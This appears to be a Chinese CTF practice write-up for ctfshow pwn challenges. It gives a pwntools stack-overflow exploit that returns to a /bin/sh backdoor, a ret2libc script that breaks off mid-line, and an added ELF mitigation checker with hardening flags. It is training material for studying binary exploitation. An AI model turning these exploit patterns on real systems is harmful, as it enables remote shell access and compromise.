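ctfshow practice notes (pwn)
Once you fall into the pwn pit, it is as deep as the sea; from then on, reversing is a stranger
Contents
- pwn02
- pwn03
- pwn04
- pwn05 (filler challenge?)
- pwn06 (filler challenge +1)
- pwn07
- pwn08 (filler?)
- pwn10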
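pwn02
Run the usual checksec first.
Load the binary into IDA.
Open the pwnme() function: it is an obvious stack overflow.
A string search turns up /bin/sh.
Just hit it directly: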
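```python
from pwn import *

io = remote('111.231.70.44', 28054)
# io = process('./pwn02')
bin_sh = 0x0804850F  # address placed over the saved return address
payload = b'a' * 13 + p32(bin_sh)  # 13 bytes of padding, then the new return address
io.sendline(payload)
io.interactive()
```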
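Solved instantly, no effort.
pwn03
The usual checksec again; only NX is enabled.
It is almost identical to the previous challenge, except that no backdoor is provided, so it has to be ret2libc.
It has to be solved against the remote target; it does not work locally, probably because the libc version differs.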
```python
from pwn import *
from LibcSearcher import *

elf = ELF('./pwn03')
# io = process('./pwn03')
io = remote('111.231.70.44', 28021)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
# Call puts(puts_got) to print the resolved address of puts, then return to main
payload1 = b'a' * 13 + p32(puts_plt) + p32(main) + p32(puts_got)
io.sendline(payload1)
io.recvuntil(b'\n\n')
puts_add = u32(io.recv(4))
print(puts_add)
libc = LibcSearcher('puts', puts_add)
libcbase=puts_add-libc.dump(
```
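
Both pwn02 and pwn03 start with checksec, and pwn03 reports only NX. The following added example (not part of the original notes) shows which ELF header fields that result is read from, so the same check can be run on your own builds. The function name `elf_mitigations` and the sample image are constructed for illustration, and only little-endian ELF files are handled.

```python
import struct

PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, ET_DYN = 0x1, 3

def elf_mitigations(data: bytes) -> dict:
    """Report NX, PIE and RELRO as recorded in an ELF image's headers."""
    if data[:4] != b"\x7fELF" or data[5] != 1:
        raise ValueError("not a little-endian ELF file")
    is64 = data[4] == 2  # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    e_type, = struct.unpack_from("<H", data, 16)
    if is64:
        e_phoff, = struct.unpack_from("<Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    else:
        e_phoff, = struct.unpack_from("<I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx = relro = False  # a missing PT_GNU_STACK is treated as an executable stack
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from("<I", data, off)
        # p_flags is at offset 4 in Elf64_Phdr and offset 24 in Elf32_Phdr
        p_flags, = struct.unpack_from("<I", data, off + (4 if is64 else 24))
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)  # NX means the stack segment is not executable
        elif p_type == PT_GNU_RELRO:
            relro = True  # segment present; full RELRO also needs DT_BIND_NOW
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def sample_elf32(stack_flags: int) -> bytes:
    """Constructed 32-bit ET_EXEC image: ELF header plus one PT_GNU_STACK entry."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH",
                               2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    # Constructed input matching "only NX": RW stack, fixed load address, no RELRO
    print(elf_mitigations(sample_elf32(0x6)))
```

A binary that reports only NX was built without position independence or RELRO; on GCC and Clang toolchains, `-fstack-protector-strong`, `-pie` and `-Wl,-z,relro,-z,now` turn on the mitigations that are missing here.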